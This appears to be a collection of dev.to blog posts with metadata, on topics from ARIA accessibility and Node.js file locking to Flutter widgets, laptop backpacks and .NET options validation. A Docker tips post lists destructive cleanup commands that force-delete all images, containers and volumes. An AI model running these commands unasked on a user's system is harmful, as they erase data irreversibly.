And that about wraps it up. I really appreciate your attendance. I'll be sticking around to answer any questions and if you want to contact me, do so at zachary@prefect.io | hasurahq_staff |
709,347 | JavaScript resources you must bookmark. | These are some great resources to consume as a JS developers. | 0 | 2021-05-26T15:44:29 | https://dev.to/pranavkumar389/javascript-resources-you-must-bookmark-4j3d | javascript | ---
title: JavaScript resources you must bookmark.
published: true
description: These are some great resources to consume as a JS developers.
tags: JavaScript
//cover_image: https://direct_url_to_image.jpg
---
1. JavaScript runtime visualizer
https://www.jsv9000.app/
2. Interactive JavaScript Tutorial
https://www.learn-js.org/en/
3. JavaScript Tutorial
https://www.javascripttutorial.net/
4. A Modern JavaScript Tutorial
https://javascript.info/
5. JavaScript Algorithm - 30 seconds of code
https://www.30secondsofcode.org/js/p/1
6. Build 30 things with vanilla JS in 30 days
https://javascript30.com/
7. JavaScript - The Right Way
https://jstherightway.org/
8. Free JavaScript Resources
https://www.java5cript.com/
Tip:- Pick one resource at a time. Enjoy the great contents.
| pranavkumar389 |
709,379 | Make your Website accessible for people with eye👁 disablities | Before getting in to the article I would like to ask you all a question ! How people with eye disab... | 0 | 2021-05-26T16:42:56 | https://dev.to/karthick30/make-your-website-accessible-for-people-with-eye-disablities-3008 | react, webdev, html, ux | Before getting in to the article I would like to ask you all a question !
```How people with eye disablities use your website ? is the website you've made is accessible for them ? ```
wait ! what ? is there a scenario like that ? 😳 🙄 🤔 😲 these were my reactions and questions I got soon after this question was thrown over me. Come on I'm doing stuff's on web for over 4 years but never thought of this scenario and I'm clueless to answer this .
But the reality is big **"YES"** there's a way ! to be frank this was the most shocking thing more than the question . Again the same set of reactions but this time they've doubbled 😳 🙄 🤔 😲 😳 🙄 🤔 😲 .
Ok if yes then how ?? many of us would have used those things without knowing their use cases .
##Aria Tags
Yeah Aria tags are the game changer here they has the capacity to handle this tricky use case .
> **Accessible Rich Internet Applications (ARIA)** is a set of attributes that define ways to make web content and web applications (especially those developed with JavaScript) more accessible to people with disabilities. _stated in MDN_
Have you researched the usage of these tags while using ? I didn't 🙋🏾 ! I thought they are only used for SEO kind of things . Another thing is other attributes we use can be accessed somehow like using

* document.getElementById("demo");
* document.getElementsByClassName("demo-class");
* document.getElementsByName("demo-input");
* document.getElementsByTagName("input");
or you can access the values during the event handle like onChange using ```e.target.value , e.target.name ```
but have you tried of accessing these aria tags ?? just try ! they can't be accessed like the other attributes ! these are not they've built for . Why because ARIA doesn't augment any of the element's inherent behavior.
>ARIA works by changing and augmenting the standard DOM accessibility tree .
##Screen Reader
So we've added the aria tags but how it will be helpful to read for the people with disablities?. Here comes the next life saver Screen Reader . Screen Reader is an app which make use of these aria tags and make a helpful voice commands for the people to use the website. They are available as an desktop app and also as a chrome extension. Check one of them [here](https://chrome.google.com/webstore/detail/screen-reader/kgejglhpjiefppelpmljglcjbhoiplfn/related)
Here I've created a small form using react that supports aria tag install the extension mentioned above , close your eyes and try submitting the form ! let me know If you've made it !
{% codesandbox bold-hertz-tcrvp %}
These attributes starting with aria- are the thing we're talking about !!
 .
That's it ! So next time when you build an application make sure your application supports aria tags , Technology is not for particular people, Make the technology accessible for everyone 💪🏽
_Get into these docs before starting aria tags_
https://developer.mozilla.org/en-US/docs/Web/Accessibility/ARIA
https://developers.google.com/web/fundamentals/accessibility/semantics-aria
Manage your Work From Home 🏡 issues using this [kit] (https://dev.to/karthick3018/manage-work-from-home-effectively-using-wfh-kit-6bc)
------------
*check my dev projects on* [github](https://github.com/karthick3018)
*Follow me on* [twitter](https://twitter.com/Karthick_R_30)
*connect with me on* [linkedIn](https://www.linkedin.com/in/karthick-raja-dev/)
*check my styles on* [codepen](https://codepen.io/karthick30)
-------------
*Thanks for your time*
*Happy coding ! Keep Sharing*
*Stay Safe*
| karthick30 |
709,386 | online compiler for latex | check online latex compiler LaTeX is a software system for document preparation. When writing, the wr... | 0 | 2021-05-26T17:09:10 | https://dev.to/sachinp67495829/online-compiler-for-latex-575a | latex, compiler, online | check <a href="https://pythonslearning.com/2021/05/which-is-free-online-compiler-editor-for-latex.html">online latex compiler
LaTeX</a> is a software system for document preparation. When writing, the writer uses plain text as opposed to the formatted text found in "What You See Is What You Get" word processors like Microsoft Word, LibreOffice Writer and Apple Pages
Resources : https://pythonslearning.com/2021/05/which-is-free-online-compiler-editor-for-latex.html
| sachinp67495829 |
709,717 | #SpeedOfLife First Week Recap | It Begins We started the #SpeedOfLife campaign last week, yay! It has been a bumpy start but we're... | 12,585 | 2021-05-27T01:43:38 | https://dev.to/armory/speedoflife-first-week-recap-6i2 | speedoflife, softwaredelivery | <h3>It Begins</h3>
We started the #SpeedOfLife campaign last week, yay!
It has been a bumpy start but we're happily moving forward. The first person I spoke with about delivering software at the speed of life was our CEO at Armory, DROdio. I posted a snippet of our conversation on Twitter last week and here that is 👇🏾
{% twitter 1390707475784011778 %}
A live stream happened.
{% youtube VfpuJckT_Tw%}
I'll let you be the judge of whether or not it was successful. It was mildly chaotic on my end but next time it will be better, I promise! We had at least one live viewer (shoutout to Morgan Lucas) and something awesome came out of my call into the void for a last-minute guest.
{% twitter 1390809997789982724 %}
I got a DM from a Performance Engineering Lead at MathWorks. She's interested in collaborating so hopefully I will be able to share a conversation between the two of us soon. I was able to chat with several people from the Armory crew about #SpeedOfLife and what it means to them. It's awesome to share their perspectives, but I'm super-excited to involve more of the DevOps community.
Look out for #SpeedOfLife on our social channels. I'll be back next Tuesday with another blog. | nikema |
709,856 | A deep dive into file locking with NodeJS | I developed a version control software for graphic designers and 2D/3D artists called Snowtrack in An... | 0 | 2021-06-07T14:21:15 | https://dev.to/sebastianrath/today-i-released-a-version-control-software-for-2d-3d-artists-and-graphic-designers-made-in-angular-electron-nck | typescript, angular, javascript, node | I developed a version control software for graphic designers and 2D/3D artists called [Snowtrack](https://www.snowtrack.io) in Angular and Electron. In this blog post, I will cover some technical challenges about file locks which I faced during the development of Snowtrack.
## What is Snowtrack?
Snowtrack is an intuitive, easy-to-use, and super-fast version control software for graphic projects. Its purpose is to make version control accessible to graphic designers and 2D/3D artists with a non-technical workflow.
To get a better understanding of Snowtracks user interface check out the following screenshot:

## What I used to build it
For the UI application I used a combination of Angular and Electron. The underlying version control engine is called **SnowFS**, an open-source project I developed as a fast and simple alternative to *Git* and *Git LFS*. Feel free to check it out on [GitHub](https://github.com/snowtrack/snowfs). A few months ago I wrote a blog post about it [here](https://dev.to/sebmtl/snowfs-let-s-bring-version-control-to-graphic-projects-10p8) on *dev.to*.
## Technical challenge no. 1
Graphic projects can differ in size tremendously. From a single Photoshop file up to a 50 GB file set of 3D scenes, textures, and assets. These project types come with their own set of problems. In the following I want to clear up some misconceptions about the topic around *file locking*.
## File Locking
Take a look at the code snippet below.
```
// Process 1
fd = fs.openSync("~/foo", "w");
// Process 2
fd = fs.openSync("~/foo", "w");
```
Imagine more than one process wants to open the same file at the same time. What do you think will happen?
**Answer:** It depends on the OS and if you're the maintainer of all processes.
When you call `fs.openSync` NodeJS will forward the call behind the scenes to an OS function as you can see from [this C code](https://github.com/libuv/libuv/blob/b201c1a0f0b1ba2365dc285f466ff6fe5307decf/src/unix/fs.c#L380-L389)
```cpp
static ssize_t uv__fs_open(uv_fs_t* req) {
return open(req->path, req->flags | O_CLOEXEC, req->mode);
}
```
The function `open(..)` is an OS function and available in all operating systems. But the internals of this function differ between Windows, Linux and macOS so I will cover them separately.
# macOS/Linux
Technically, neither macOS nor Linux have true file-locking mechanisms. Although you can read or write-lock a file using a function called [`fcntl`](https://man7.org/linux/man-pages/man2/fcntl.2.html), only programs which use this function regard and respect the file lock. This means, any other process which **doesn't** use `fcntl` and directly wants to open a file can acquire a file handle and manipulate the content as long as the file permissions allow it. What a bummer.
That's why file locking on macOS and Linux is also called ["advisory file locking"](https://news.ycombinator.com/item?id=17601581).
## Windows
Windows is more complicated in that matter. Windows offers two functions to open a file. Either through the Windows API function called [CreateFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) (yes, that's really the name to open files),...
...or through [`open(..)`](https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/open?view=msvc-160). But the `open(..)` function on Windows is a POSIX extension and uses `CreateFile` internally as well.
As we've seen above NodeJS uses `open(..)`, but since we know that this is just a wrapper for `CreateFile`, let's check out that function:
```cpp
// The low-level open function of Windows.
HANDLE CreateFile(
LPCSTR lpFileName,
DWORD dwDesiredAccess,
DWORD dwShareMode,
LPSECURITY_ATTRIBUTES lpSecurityAttributes,
DWORD dwCreationDisposition,
DWORD dwFlagsAndAttributes,
HANDLE hTemplateFile
);
```
`CreateFile` has a parameter called `dwShareMode`. A file that is opened with `dwShareMode=0` **cannot** be opened again until its handle has been closed.
So if you use `open(..)` on a file that was already open by another process with `CreateFile(…, dwShareMode=0)` you receive this error message:
> The process cannot access the file because it is being used by another process
On the other hand, if you use `fs.openSync` in NodeJS, or `open(..)` in C/C++, to open a file that hasn't been opened yet, you cannot prevent another application from modifying it*.
\* Unless you you use file permissions as a workaround, but that’s not really a file lock.
To prove this, you will see that our `fs.openSync` call executes `CreateFile` with the read/write shared flags to comply with the POSIX standard.

This means on Windows you cannot prevent another application from opening and modifying your file if you don't use `CreateFile`.
## What does this have to do with Snowtrack?
Imagine a user saving a big file in a graphic application and while the file is still being written to disk, the user attempts to commit the file change. How does Snowtrack deal with this?
As we learned, `open(..)` has no file locking and most applications don't even follow the file protocol and Snowtrack cannot control how Photoshop, Blender, and co. open and write their files.
This means the only reliable chance of detecting if a file is still being written by another process is to check prior to a commit if any process on the system has a write handle on that file.
- On Windows, I solved this with a custom helper process and and the Windows API of [Restart Manager](https://docs.microsoft.com/en-us/windows/win32/rstmgr/about-restart-manager) which is mainly used for installers to ensure the files it is about to replace are not open anymore.
- On MacOS I invoke the system process [`/usr/sbin/lsof`](https://ss64.com/osx/lsof.html) (list open files) with an inclusion of the working-directory to speed up the execution of this command.
### What else?
The development of Snowtrack came with countless technical challenges and I would be happy to share more insights.
*File locking*, *Electron/Angular* *race conditions*, *I/O saturation*, *build server*, *update mechanisms*, *edge cases*, .. with this project I touched many subjects and I would be happy to write a follow-up blog post if you are interested. Let me know in the comments below.
If you want to support SnowFS, Snowtrack or me then feel free to join me on [Twitter](https://twitter.com/snowtrack_io).
Thanks for reading :-)
## TLDR
Don't get me started on file-locking.
## Addendum: What about the *"File In Use"* dialog in Windows?
If you are a Windows user you might have seen this error message before:

Windows, or rather NTFS, behaves very different compared to other file systems like *HFS+*, *APFS*, *ext3*, ...
There is no equivalent to inodes in NTFS and therefore no garbage collection deletes the file if the last file handle to an already deleted file is closed. The *File in Use* dialog only indicates, that if any process has a file handle to a given file (no matter how it got opened), it cannot be renamed, moved, or deleted. That does not imply a file lock on the file content. | sebastianrath |
709,935 | First Video | https://www.youtube.com/watch?v=F16svetYoaM | 0 | 2021-05-27T08:20:49 | https://dev.to/devpaulius/first-video-5dcm | firstpost, video, firstvideo, firsttime | https://www.youtube.com/watch?v=F16svetYoaM | devpaulius |
710,099 | This is my First Ever Post in this website.. | A post by The Planet | 0 | 2021-05-27T12:13:02 | https://dev.to/sreekanth99/this-is-my-first-ever-post-in-this-website-139m | sreekanth99 | ||
710,174 | Top 11 Flutter Widgets To Know In 2021 | These days, flutter is one of the most popular framework for developing mobile, web and desktop appli... | 0 | 2021-05-27T14:21:52 | https://dev.to/ltdsolace/top-11-flutter-widgets-to-know-in-2021-3i35 | flutter, apps, android | These days, flutter is one of the most popular framework for developing mobile, web and desktop applications. It is full of widgets and it makes it more sustainable. Flutter widgets are used for developing high-quality cross platform applications because they are customizable and offer extensive flexibility & fluidity that can be the best fit for any mobile app type. Widget elements are organized in the form of a widget tree. The manner in which the widgets are placed defines the operation of the front-end of the native applications screen. The two primary things of Flutter widgets are the configuration and the widget state. There are lots of Flutter widgets available and here we’ll discuss the top 11 widgets for developing flutter apps. Before digging into the flutter widget list, let us see the types of flutter widgets.
You can also know- Amazing New Features Of Flutter 2.0
#Types Of Flutter Widgets-
There are two types of Widgets in Flutter- Stateless widget and Stateful widget. Based on the two types, these widgets are further categorized into 14 different categories as- Async, Accessibility, Assets, Images and Icons, Layout, Interaction Models, Material components, Animation and motion, Painting and effects, styling, text.
#Top 11 Flutter Widgets-
**1. SafeArea-**
This widget is best to use for developing dynamic and adaptive UI. It helps to adjust the screen with various devices of different width and height. Also, it helps in overcoming the area constraints induced by status bar, notches, navigation bar etc. It’s implementation doesn’t allow the design to overlay any of the areas where there is frontend UI visibility constraint and so makes it error-free. Hence SafeArea widget is also known as padding widget that adds padding to android or iOS apps wherever there is a constraint. SafeArea widget will also indent the child with the necessary padding necessity, particularly for the devices with the Notch like iPhone X.
**2. ConstrainedBox-**
It is a built-in widget available in Flutter SDK. Generally it is used to add size limitations to the child widgets. It allows developers to add flexibility with respect to height and width in a child widget. But the widget has limitation when the child is bigger in size than the container. It cuts the child’s view, making the front end look somewhat out of the line. This issue can be tackled by not defining the maxHeight property and adjusting it to by default value of double.infinity. Example of this widget is-
if you wanted child to have a minimum height of 50.0 logical pixels, you could use const BoxConstraints(minHeight: 50.0) as the constraints.
**3. Align Widget-**
You should organize components inside the UI. Flutter can compose these widgets together. But how do we position a child under a parent widget? We can use the Align widget. For instance, how we choose the position of the text inside a container. Following code shows you the result.
Know more at- [https://solaceinfotech.com/blog/top-11-flutter-widgets-to-know-in-2021/] | ltdsolace |
710,326 | The Ultimate Eleventy Template for your blog with a FREE minimalist theme [Open Source] | A free and open source Eleventy template with Tailwind CSS 2, Webpack 5, ESLint, Prettier, Image optimization, SEO friendly and Netlify CMS. Download the best Eleventy Themes and Templates. | 0 | 2021-05-27T15:18:16 | https://dev.to/ixartz/the-ultimate-eleventy-template-for-your-blog-with-a-free-minimalist-theme-open-source-3h47 | webdev, tailwindcss, javascript, showdev | ---
title: The Ultimate Eleventy Template for your blog with a FREE minimalist theme [Open Source]
published: true
description: A free and open source Eleventy template with Tailwind CSS 2, Webpack 5, ESLint, Prettier, Image optimization, SEO friendly and Netlify CMS. Download the best Eleventy Themes and Templates.
tags: webdev, tailwind, javascript, showdev
cover_image: https://creativedesignsguru.com/demo/Eleventy-Starter-Boilerplate/assets/images/posts/eleventy-js-starter-boilerplate.png
---
Yesterday, I've just updated my 11ty Starter code to the latest version with Tailwind CSS 2 and Webpack 5. Built in developer in mind with great tooling with ESLint and Prettier. The template is production-ready with SEO features. It also includes a little bonus with Netlify CMS (optional).
You can test the template at [Eleventy Template live demo](https://creativedesignsguru.com/demo/Eleventy-Starter-Boilerplate/)
If you are interested you can view the source code at [Eleventy Template GitHub Repo](https://github.com/ixartz/Eleventy-Starter-Boilerplate)
- 🔥 11ty for SSG
- 🎨 Integrate with Tailwind CSS
- ⚡️ Lazy load images with lazysizes
- ✨ Compress image with Imagemin
- 🎈 Syntax Highlighting with Prism.js
- ☕ Minify HTML & CSS with HTMLMinifier and cssnano
- ✏️ Linter with ESLint
- 🛠 Code Formatter with Prettier
- 💨 Live reload
- 📦 Module Bundler with Webpack
- 🦊 Templating with EJS
- 🤖 SEO metadata and Open Graph tags
- ⚙️ JSON-LD for richer indexing
- 🗺 Sitemap.xml
- ⚠️ 404 page
- 📖 Pagination
- ✅ Cache busting
- 💯 Maximize lighthouse score
- 🌈 Include a FREE minimalist blog theme
- 🗒 Netlify CMS (optional)
{% github ixartz/Eleventy-Starter-Boilerplate %}
## Built with latest technologies
- Eleventy
- Tailwind CSS 2.0
- Webpack 5
- ESLint
- Prettier
## Other 11ty Templates and Themes
You can also check my other Eleventy templates at:
| [Blue Dark Eleventy Theme](https://creativedesignsguru.com/blue-dark-eleventy-theme/) | [Blue Eclatant Eleventy Theme](https://creativedesignsguru.com/blue-eclatant-eleventy-theme/) |
| --- | --- |
| [](https://creativedesignsguru.com/blue-dark-eleventy-theme/) | [](https://creativedesignsguru.com/blue-eclatant-eleventy-theme/) |
| [Blue Modern Eleventy Theme](https://creativedesignsguru.com/blue-modern-eleventy-theme/) | [Blue Minimalist Eleventy Theme](https://creativedesignsguru.com/blue-minimalist-eleventy-theme/) |
| --- | --- |
| [](https://creativedesignsguru.com/blue-modern-eleventy-theme/) | [](https://creativedesignsguru.com/blue-minimalist-eleventy-theme/) |
You can easily customize the themes based on your needs by saving you development and design time. | ixartz |
710,366 | 10 Laptop Backpack Recommendations for the Remote Software Developer in 2021 | One of the joys of remote work is that you can work wherever there’s good wifi. Coffee shops? Check.... | 0 | 2021-06-22T10:30:52 | https://x-team.com/blog/backpacks-recommendations/ | remoteworking, travel, backpack, productivity | ---
title: 10 Laptop Backpack Recommendations for the Remote Software Developer in 2021
published: true
date: 2021-05-27 11:49:00 UTC
tags: remoteworking,travel,backpack,productivity
canonical_url: https://x-team.com/blog/backpacks-recommendations/
---
One of the joys of remote work is that you can work wherever there’s good wifi. Coffee shops? Check. Co-working spaces? Check. On top of [Table Mountain in South Africa](https://x-team.com/blog/x-outpost-south-africa/)? Also check. But in order to work wherever you want, you need a good laptop backpack. Here are 4 factors you need to consider when you’re in the market for a backpack, as well as 10 specific laptop backpacks we recommend.
## 4 Factors to Consider in a Laptop Backpack
### Comfort
A good laptop backpack is comfortable. Adjustable straps, a hip belt, a mesh covering to avoid a sweaty back, and internal framing to distribute weight all help to make a backpack feel comfortable. Material plays a big role in comfort too, because canvas and leather backpacks are heavier than nylon and polyester backpacks.
Comfort is even more important when your laptop backpack will function as a travel backpack as well. In such cases, visit a shop and try out a few backpacks to see how comfortable they are instead of ordering one blindly online.
### Sturdiness
A laptop can cost thousands of dollars, so you want a backpack that properly protects it when you’re moving about. Ideally, this means a separate compartment and sleeve for your laptop, plus plenty of padding at the backpack's top, bottom, and sides.
It also means that your backpack should be water-resistant, including the zippers. You’ll inevitably come across a scenario where it starts pouring rain and you don’t have an umbrella. No water should be able to enter the backpack; your gear should always be fully protected.
### Capacity
Consider the size of your device before buying a laptop backpack. While most backpacks can fit a 16” MacBook Pro, finding a backpack that can fit anything larger is much more difficult (17” laptops, anyone?). In addition, think about what else you tend to take with you. Books? A camera? A notepad? Take those into account when making a purchasing decision.
Backpacks are measured in liters. Anything between 10-16 liters should just about fit a laptop and a few books, while anything that’s 20-25 liters should be okay for most purposes. Anything above 30 liters comes in handy for weekend trips or for those packing professional camera gear.
### Warranty
Here’s a good rule of thumb when it comes to warranty: the better the product, the better the warranty. Companies that make quality backpacks are often willing to back up their claim with generous warranties.
At some point, your backpack will malfunction (probably a zipper, it’s always a zipper). A company that repairs issues for free for the lifetime of the backpack comes in real handy when this happens.
## 10 Great Laptop Backpacks in 2021
### Db Scholar

The [Db Scholar](https://dbjourney.com/the-scholar-whiteout) is a great-looking backpack with a capacity of 17 liters. It has an internal laptop pocket that fits anything up to a 16” MacBook Pro and weighs 0.7 kg. The Scholar backpack costs €139 (~ $170) and comes with a two-year warranty.
### Peak Design Everyday

The [Peak Design Everyday](https://www.peakdesign.com/products/everyday-backpack?variant=29743300771884) is a popular backpack with a capacity of either 20 or 30 liters. It has a protective laptop sleeve that can fit up to a 15” laptop and additional compartments for camera gear. The Everyday backpack costs $259.95 for the 20L and $289.95 for the 30L. All Peak Design backpacks come with lifetime warranty that covers manufacturing defects and breakages.
### North Face Kaban

The [North Face Kaban](https://www.thenorthface.com/shop/kaban-nf0a2zek) is a sleek backpack with a capacity of 26 liters. It comes with a protective 15” laptop sleeve and weighs 1.2 kg. The Kaban backpack is made of polyester, has a big front compartment, and costs $129. All North Face backpacks come with a limited lifetime warranty.
### Osprey Arcane Large Day

The [Osprey Arcane Large Day](https://www.osprey.com/us/en/product/arcane-large-day-ARCANLGDAYS20.html) is a recycled polyester backpack (made of 10.5 plastic bottles) with a capacity of 20 liters. It has a 15” laptop sleeve that’s easily accessible because of the large zip. The Arcane Large Day comes in at a light 0.64 kg and costs $100. Osprey repairs any damage or defect to your backpack free of charge.
### eBags Pro Slim

The [eBags Pro Slim](https://www.ebags.com/backpacks/laptop-backpacks/pro-slim-laptop-backpack/117775XXXX.html) is a polyester backpack that fits a laptop up to 17”. The backpack has a padded air-mesh back panel and pass-through sleeves that can secure your bag onto rolling luggage. It weighs 1.8 kg, costs $79.99, and has a limited lifetime warranty.
### Timbuk2 Authority Deluxe

The [Timbuk2 Authority Deluxe](https://www.timbuk2.com/products/1825-authority-laptop-backpack-deluxe?variant=31334648152106) is a light, but sturdy backpack that has a capacity of 28 liters. It weighs 1 kg and fits most 15-17” laptops and tablets. It has several compartments, an airmesh back panel, and padded straps for extra comfort. The backpack costs $139 and comes with lifetime warranty.
### Bellroy Classic

The [Bellroy Classic](https://bellroy.com/products/classic-backpack/nylon/black#slide-0) is a 20-liter backpack made for urban travelers. It is made of recycled water bottles, holds laptops up to 16”, and has a water-resistant top pocket for your phone and keys. It weighs 0.75 kg and costs either $89 or $139 depending on the color you choose. The Bellroy Classic has a 3-year warranty.
### Patagonia Arbor Daypack

The [Patagonia Arbor Daypack](https://www.patagonia.com/product/arbor-daypack-20-liters/48016.html?dwvar_48016_color=FGE&cgid=luggage-laptop-bags) is a small, light backpack that weighs only 0.42 kg and has a capacity of 20 liters. It has a padded laptop sleeve that fits most 15” laptops and is made of recycled polyester fabric that’s water-resistant. The backpack costs $89 or $34.99 if you choose the geode purple cover.
### Aer Day Pack 2

The [Aer Day Pack 2](https://www.aersf.com/day-pack-2-black) is a nylon, weather-resistant backpack that weighs 1.32 kg. It has a capacity of 14.8 liters and can fit any laptop up to a 16” MacBook Pro. The backpack has a mesh back panel and quality YKK zippers. Aer products come with lifetime warranty.
### Ethnotek Raja

The [Ethnotek Raja](https://ethnotek.com/products/30-liter-backpack?variant=37004849742) is a beautiful, ethically sound backpack with a capacity of 30 liters. The Ethnotek Raja is made of traditional handmade textiles and can fit up to a 17” MacBook Pro. The backpack is waterproof, has YKK zippers, and weighs 0.9 kg. All Ethnotek products are eligible for a full refund if there’s a defect to the material or workmanship of the product. | tdmoor |
710,373 | On Good Coworkers & Business Humility | “What makes a good coworker in tech? What makes a bad one?” I saw these two questions posted in a... | 0 | 2022-02-11T19:58:07 | https://theagilecouch.com/2020/05/22/on-good-coworkers-business-humility/ | uncategorized | ---
title: On Good Coworkers & Business Humility
published: true
date: 2020-05-22 19:52:46 UTC
tags: Uncategorized
canonical_url: https://theagilecouch.com/2020/05/22/on-good-coworkers-business-humility/
---
> **“What makes a good coworker in tech?
> What makes a bad one?”**
I saw these two questions posted in a coding forum today as part of JC Smiley’s daily questions, which he then reposts with the answers to [his LinkedIn feed](https://www.linkedin.com/in/jcsmileyjr/). If you’re getting started in development, you should follow him.
**“What traits or actions would make a horrible co-worker in tech?”**
**“What traits or actions would make a fantastic co-worker in tech”**
I read the replies so far, as I considered my answers. The answers were good examples of specific characteristics:
- No respect for others
- Pushes work onto others
- Doing the minimal amount of work
- Negativity
- Know-it-alls
- Doesn’t ask questions when they need help
- Advance themselves at the expense of others
- “Holds an entire team hostage for their personal predilections” (#suspiciouslyspecific)
- Seeks all the glory for themselves
- Makes every meeting longer than it needs to be
- Doesn’t come through on their responsibilities
The respondents often mentioned specifically that their examples of what makes a great coworker were the exact opposite traits. Which is not surprising, although there’s no reason to assume they are diametrically opposed:
- Willing to help and share knowledge
- Leads by example
- Willing to go above and beyond just because that’s what a good human being should do
- Open to ideas
- Open to discussion
- Good personality
- Asks questions when they need help and gets things done as a result
- Enjoys learning and talking about new things
- The person who makes others better
- Exhibits servant leadership before they have the leadership title
- Being a decent person and treating others like one
I always think about patterns and root causes, and I thought particularly about this as a business-context specific question. We’re not looking for what makes a good person, but a good coworker. Mr. Rogers was an amazing person, but would he make a great DevOps Engineer? I don’t know. The mention of good personality also made me wonder, does being a good coworker require someone to be a good person in general? Is it important to enjoy playing couch co-op Super Mario Party with a coworker? Is the person you’ve shared the most beer with going to make a great coworker?
I believe in philosophy as a core element of business, and one almost entirely overlooked on a daily routine at least. What I believe makes a person a good coworker is what makes a good business, a singular goal; capital T, capital G— The Goal, and alignment with that goal. We form businesses or other organizations as “machine made out of people” to accomplish some specific end. Whether The Goal is revenue, profit, literacy, health outcomes, or saturating North Korea with wifi access, a lack of transparency and alignment with The Goal is a detriment. The lack of a clearly expressed goal allows individuals within the company to implicitly, perhaps accidentally, pursue independent goals. Alignment with The Goal is a requirement for a coherent and cohesive organization. You may not personally value elbowing someone in the ribs, but if your context is the NBA, if you can’t be aligned with that goal, you don’t belong in that context. The Goal should be so clear that everyone can remember it and quote it easily. So transparent that anyone can point to it on the wall when any debate about decisions is being waged. The Goal should clarify, align, and take out the garbage.
I’m coining as “Business Humility” the specific context of subsuming personal characteristics, goals, and fears to an alignment with The Goal. I am not making a case for slavish devotion to a business, or allowing personal goals to be flattened by a corporate behemoth. I say alignment, which should suggest pursuit of The Goal also accomplishes personal goals along the same path. The coworker who is aligned with the company goal does not have room in his personal philosophy for a fear of being replaced if he shares his technical knowledge with others. He doesn’t need to hoard glory. When a front-end designer makes the decision to initiate a pair programming session, navigating while a junior developer drives from the keyboard, she is showing servant leadership, sharing, teaching, and alignment with the company goals by increasing the bandwidth of her skill set.
A bad coworker is someone is essentially saying through their actions “The company exists to provide for my personal goals.”
A good coworker recognizes that alignment with the company means both parties benefit from the trade. Aligning with a clear and transparent goal, and the business humility displayed is the foundation of being a good coworker. | stevetwips |
710,395 | Made a Real Time Chat Application using React.js | 1.This is a fully functional Real time Chat Application made using React.js with functionalities like... | 0 | 2021-05-27T17:04:10 | https://dev.to/bhavesh1235/made-a-real-time-chat-application-using-react-js-1nni | react, webdev, javascript, css | 1.This is a fully functional **Real time Chat Application** made using React.js with functionalities like online status,image support,Read receipent,multiple rooms
2.Link to **Github repo**-> [Link](https://github.com/bhavesh1235/React-Chat-App)
If you like the project please give it a **star** at github
3.Backend is hosted by [https://chatengine.io](https://chatengine.io)
| bhavesh1235 |
710,446 | Some Docker commands make your life easier | In this post, I show some useful docker commands that you may be less familiar with them and they mak... | 0 | 2021-05-27T18:16:51 | https://dev.to/moesmp/some-docker-commands-make-your-life-easier-1ob6 | In this post, I show some useful docker commands that you may be less familiar with them and they make your life easier as a developer. Lets begin with build command:
```yml
docker build -f path/to/file/Dockerfile -t image-name .
```
#####`-f` lets you specify the path to `Dockerfile`.
####Tag or rename image
```yml
docker tag old-image-name new-image-name
```
######You Can use image id rather than image name:
```yml
docker tag 0e5574283393 new-image-name
```
####Save image:
```yml
docker save image-name -o output-image-name
```
######If the image name contains `/`:
```yml
docker save image-name/image-name > output-image-name
```
####Load image:
```yml
docker load --input output-image-name
```
####Remove images that name starting with `myimage`
```yml
docker rmi $(docker image ls 'myimage*' -q)
```
######Delete images whose names starting with `myimage`.
####Delete all untagged images
```yml
docker rmi $(docker images -f "dangling=true" -q)
```
####Delete all images (warning)
```yml
docker rmi -f $(docker images -q)
```
####Start all stopped containers
```yml
docker start $(docker ps -aq)
```
####Stop all running containers
```yml
docker stop $(docker ps -q)
```
####Delete all containers
```yml
docker rm $(docker ps -aq)
or
docker container stop $(docker container ls –aq) && docker system prune –af ––volumes
```
####Delete any resources — images, containers, volumes, and networks — that are dangling (warning)
```yml
docker system prune
```
####Delete any stopped containers and all unused images (warning)
```yml
docker system prune -a
```
####Copy file to container
```yml
docker cp ./path/to/file.ext container-name:/path/to/destination/inside/container
```
####Build an image from running container
```yml
docker commit container-name image-name:tag
```
####Mount file to a container
```yml
docker run -v /path/to/file/appsettings.json:/app/appsettings.json --name my-image image-name
```
####Get into a Docker container's shell
```yml
docker exec -it container-name /bin/bash
```
####Display volumes with mounted path
```yml
docker ps --format 'table {{.ID}}\t{{.Names}}\t{{.Image}}\t{{.Mounts}}'
```

####Delete volumes whose names starting with `myvloume`.
```yml
docker volume rm $(docker volume ls --filter name=myvloume -q)
```
####Delete dangling volumes
```yml
docker volume ls -f dangling=true
```
####Build docker-compose from several files
```yml
docker-compose -f docker-compose.yml -f docker-compose.dev.yml build
```
####Scale a service
```yml
docker-compose scale service-name=2
```
**Command that contains `$` could be executed on windows command prompt (cmd), use `PowerShell` instead** | moesmp | |
710,465 | [Quick Tip] Improving developer experience with Options Pattern validation on start. | When we're new or have less contact with some project is hard to understand all configuration possibi... | 0 | 2021-05-27T18:53:49 | https://dev.to/antoniofalcaojr/quick-tip-improving-developer-experience-with-options-pattern-validation-on-start-3ac2 | dotnet | When we're new or have less contact with some project is hard to understand all configuration possibilities.
**Option pattern** is the most appropriate way to inject environment settings options into the application. isolating the options by scenario is adhering to important software engineering principles, such as *Principle of Interface Segregation (ISP)* and *Separation of Concerns*.
Validate the options is a good way to indicate what or how the definitions are out of the expectations, But until **.NET 5** the interruption provided from validation just was thrown in run time.
From **.NET 6** it is possible to enforce options validation check on start rather than in runtime, with the `ValidatiOnStart()` extension method from `OptionsBuilder<TOptions>`.
Below a simple example using `ValidateDataAnnotations()` and `ValidateOnStart()`:
```c#
public static class ServiceCollectionExtensions
{
public static OptionsBuilder<ApplicationOptions> ConfigureApplicationOptions(
this IServiceCollection services, IConfigurationSection section)
=> services
.AddOptions<ApplicationOptions>()
.Bind(section)
.ValidateDataAnnotations()
.ValidateOnStart();
}
```
And the usage in StartUp:
```c#
services.ConfigureApplicationOptions(
_configuration.GetSection(nameof(ApplicationOptions)));
```
`ApplicationOptions` defining property as **Required** and **URL**:
```c#
public class ApplicationOptions
{
[Required, Url]
public string HttpClientAddress { get; init; }
}
```
`AppSettings` setting the address wrongly on purpose:
```json
{
"ApplicationOptions": {
"HttpClientAddress" : "localhost"
}
}
```
And then, when running the application, the interruption throws the error:
```log
Microsoft.Extensions.Options.OptionsValidationException:
DataAnnotation validation failed for members: 'HttpClientAddress'
with the error: 'The HttpClientAddress field is not a valid
fully-qualified http, https, or ftp URL.'.
```
As we can see, the error is pretty clear and indicates what way we can take to solve the problem.
### Another validation approache
